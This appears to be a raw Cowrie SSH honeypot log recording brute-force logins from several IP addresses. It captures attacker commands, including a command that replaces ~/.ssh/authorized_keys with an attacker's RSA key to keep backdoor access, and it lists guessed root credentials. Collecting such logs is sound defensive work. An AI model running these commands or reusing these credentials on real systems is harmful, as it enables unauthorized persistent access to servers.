{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:13.802348Z","src_ip":"181.218.9.86","session":"0f178c210321"}
{"eventid":"cowrie.session.connect","src_ip":"81.192.46.45","src_port":57768,"dst_ip":"1.2.3.4","dst_port":22,"session":"485bea26d3b4","protocol":"ssh","message":"New connection: 81.192.46.45:57768 (1.2.3.4:22) [session: 485bea26d3b4]","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.165844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.167026Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.228169Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.login.success","username":"root","password":"sparky","message":"login attempt [root/sparky] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.514906Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:03:35.698829Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.699583Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.700393Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.762873Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:03:35.934007Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.934730Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.997640Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:35.998868Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.session.connect","src_ip":"81.192.46.45","src_port":57776,"dst_ip":"1.2.3.4","dst_port":22,"session":"81001f787e5e","protocol":"ssh","message":"New connection: 81.192.46.45:57776 (1.2.3.4:22) [session: 81001f787e5e]","sensor":"my-vps","timestamp":"2025-08-24T23:03:36.070441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:36.071598Z","src_ip":"81.192.46.45","session":"81001f787e5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:36.139084Z","src_ip":"81.192.46.45","session":"81001f787e5e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:03:36.451659Z","src_ip":"81.192.46.45","session":"81001f787e5e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:37.521191Z","src_ip":"81.192.46.45","session":"81001f787e5e"}
{"eventid":"cowrie.session.connect","src_ip":"81.192.46.45","src_port":57784,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ac067aa7de4","protocol":"ssh","message":"New connection: 81.192.46.45:57784 (1.2.3.4:22) [session: 2ac067aa7de4]","sensor":"my-vps","timestamp":"2025-08-24T23:03:37.574466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:37.575417Z","src_ip":"81.192.46.45","session":"2ac067aa7de4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:37.634322Z","src_ip":"81.192.46.45","session":"2ac067aa7de4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:03:37.909813Z","src_ip":"81.192.46.45","session":"2ac067aa7de4"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:37.970528Z","src_ip":"81.192.46.45","session":"485bea26d3b4"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:37.971458Z","src_ip":"81.192.46.45","session":"2ac067aa7de4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":53632,"dst_ip":"1.2.3.4","dst_port":22,"session":"10de25006e2c","protocol":"ssh","message":"New connection: 196.251.115.108:53632 (1.2.3.4:22) [session: 10de25006e2c]","sensor":"my-vps","timestamp":"2025-08-24T23:03:44.493436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:03:44.856257Z","src_ip":"196.251.115.108","session":"10de25006e2c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:03:44.856975Z","src_ip":"196.251.115.108","session":"10de25006e2c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345678","message":"login attempt [oracle/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:03:47.978895Z","src_ip":"196.251.115.108","session":"10de25006e2c"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:49.228351Z","src_ip":"196.251.115.108","session":"10de25006e2c"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.90.146","src_port":56932,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c0b7be3f0d0","protocol":"ssh","message":"New connection: 185.255.90.146:56932 (1.2.3.4:22) [session: 1c0b7be3f0d0]","sensor":"my-vps","timestamp":"2025-08-24T23:03:55.281543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:55.282350Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:55.383130Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.login.success","username":"root","password":"sparky","message":"login attempt [root/sparky] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:03:55.828856Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:03:56.047820Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.048870Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.049752Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.151599Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:03:56.450966Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.451656Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.554379Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.555449Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.90.146","src_port":56934,"dst_ip":"1.2.3.4","dst_port":22,"session":"eef2dabca4e7","protocol":"ssh","message":"New connection: 185.255.90.146:56934 (1.2.3.4:22) [session: eef2dabca4e7]","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.644418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.646379Z","src_ip":"185.255.90.146","session":"eef2dabca4e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:56.744766Z","src_ip":"185.255.90.146","session":"eef2dabca4e7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:03:57.141380Z","src_ip":"185.255.90.146","session":"eef2dabca4e7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:58.243686Z","src_ip":"185.255.90.146","session":"eef2dabca4e7"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.90.146","src_port":56944,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b597b017b98","protocol":"ssh","message":"New connection: 185.255.90.146:56944 (1.2.3.4:22) [session: 3b597b017b98]","sensor":"my-vps","timestamp":"2025-08-24T23:03:58.329757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:58.330682Z","src_ip":"185.255.90.146","session":"3b597b017b98"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:58.419873Z","src_ip":"185.255.90.146","session":"3b597b017b98"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:03:58.819573Z","src_ip":"185.255.90.146","session":"3b597b017b98"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:58.910995Z","src_ip":"185.255.90.146","session":"3b597b017b98"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:58.922003Z","src_ip":"185.255.90.146","session":"1c0b7be3f0d0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":58814,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fcc4b6f8a73","protocol":"ssh","message":"New connection: 196.251.115.108:58814 (1.2.3.4:22) [session: 5fcc4b6f8a73]","sensor":"my-vps","timestamp":"2025-08-24T23:04:30.674294Z"}
